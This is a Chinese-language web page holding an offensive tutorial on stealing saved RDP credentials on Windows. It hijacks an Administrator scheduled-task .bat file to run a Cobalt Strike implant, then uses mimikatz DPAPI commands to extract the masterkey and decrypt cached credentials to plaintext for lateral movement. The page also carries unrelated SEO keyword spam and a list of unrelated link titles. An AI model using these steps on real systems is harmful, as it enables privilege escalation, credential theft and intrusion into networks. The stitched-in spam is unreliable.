当前位置: 首页 > wzjs >正文

wordpress页面栏目搜索引擎优化论文

wordpress页面栏目,搜索引擎优化论文,网站维护一次一般要多久,温州哪里有做网站RDP(远程桌面协议)在连接过程中会缓存凭据,尤其是在启用了 "保存密码" 或 "凭据管理器" 功能时。这个缓存的凭据通常是用于自动填充和简化后续连接的过程。凭据一般包含了用户的用户名和密码信息,或者是经过加…

RDP(远程桌面协议)在连接过程中会缓存凭据,尤其是在启用了 "保存密码" 或 "凭据管理器" 功能时。这个缓存的凭据通常是用于自动填充和简化后续连接的过程。凭据一般包含了用户的用户名和密码信息,或者是经过加密的身份验证令牌

所以我们想登录这个rdp缓存,就是先找到凭证,再通过mimikatz来解密凭证,获取明文

0x01 以administrator权限上线

WIN+R 输入taskschd.msc

打开任务计划程序

找到批处理文件(.bat) 是Administrator创建的,找到他的目录

写入cs马子

后在任务计划程序运行net.bat

就成功上线了

注意:不是说找到一个由administrator创建的.bat文件就行,而是说在计划任务中,这个由administrator创建的.bat可以以administrator的身份去运行。

0X02 找到RDP凭据

用administrator权限来执行下面的命令

cmdkey /list

发现存在凭证后

再用里面的文件浏览功能

之后找到下面的凭据

再次说明,这个凭据是因为administrator在RDP其他主机的时候,选择了记住我的凭证功能,然后在本地保留了一个凭证

0x03 获取guidMasterKey

privilege::debug
dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\F18D03964B3469BAEA4542A7792D663B

0x04 获取MasterKey对应的

privilege::debug 
sekurlsa::dpapi

0x05 拿MasterKey进行解密

 mimikatz dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\F18D03964B3469BAEA4542A7792D663B /masterkey:2af578e7d889e691901422cabdd559e42d0a03882073e7ca46abc03422547ec7108113dc8928326cc181c69b6eff2fa7d87a06254474f0a892f9c183d56aae55

找到明文密码 就可以登录,达到横向移动->RDP的渗透手法

http://www.dtcms.com/wzjs/238654.html

相关文章:

  • 做网站配什么电脑电脑学校培训
  • 唐山网站建设设计网站统计分析工具
  • 大连网站建设比较好的公司关键词
  • 办公内网网站建设标准seo价格查询公司
  • 深圳网络营销方案站长工具之家seo查询
  • 怎么看一个网站是谁做的我们公司在做网站推广
  • 个人网站备案查询私域流量运营管理
  • 沈阳网站模板外贸海外推广
  • 三亚做网站的公司seo优化网站推广
  • 定制企业网站app推广项目从哪接一手
  • 产品外包装设计网站今日热点新闻事件简介
  • 在家做网站指数函数
  • 网络营销的六大新特征网店seo是什么意思
  • 中国建设银行网站官网下载安装搜索引擎优化的办法有哪些
  • 电子商务网站建设与管理课件广东网约车涨价
  • 网页设计 站点中山疫情最新消息
  • 信息技术网站建设专业电子技术培训机构
  • 广州品牌网站设计微信引流的十个方法
  • 个人网站备案做商城百度网盘帐号登录入口
  • 土木工程毕业论文代做网站域名查询工具
  • 文明网站机制建设冯耀宗seo教程
  • 做水产的都用什么网站怎么优化网站关键词的方法
  • 搞定设计网站做的图怎么下载不了站长seo综合查询
  • 北京比较好的网站建设公司百度重庆营销中心
  • 网站资料筹备营销网站建设方案
  • 哪个博客可以做单页网站白云百度seo公司
  • 深圳小程序开发南京seo排名公司
  • 盐城经济技术开发区建设局网站seo自学网站
  • 利用百度搜索自己的网站推广普通话手抄报模板可打印
  • vs2012手机网站开发教程营销策划主要做些什么